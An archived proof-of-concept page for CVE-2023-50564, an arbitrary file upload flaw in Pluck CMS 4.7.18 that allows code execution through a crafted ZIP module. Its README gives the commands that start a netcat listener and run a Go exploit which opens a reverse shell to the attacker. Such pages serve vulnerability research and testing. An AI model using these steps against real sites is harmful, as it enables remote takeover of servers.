CVE-2023-50564 PoC — Pluck 安全漏洞

Source

https://github.com/ipuig/CVE-2023-50564

Associated Vulnerability

Title:Pluck 安全漏洞 (CVE-2023-50564)
Description:Pluck是一套使用PHP语言开发的内容管理系统（CMS）。 Pluck v4.7.18版本存在安全漏洞，该漏洞源于组件 /inc/modules_install.php 中存在任意文件上传漏洞，允许攻击者通过上传精心设计的 ZIP 文件来执行任意代码。

Description

CVE-2023-50564 PoC

Readme

# CVE-2023-50564

## How to use

First setup a listener for the reverse shell.  
*Terminal 1*
```bash
nc -nlvp <lport>
```
Execute the script which will attempt to install a pluck module sending the reverse shell back to us.  
*Terminal 2*
```bash
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>
```

File Snapshot


 [4.0K]  /data/pocs/27c1022ef15d515b520582cf8e12d07c1d2c37de
├── [3.3K]  exploit.go
└── [ 324]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!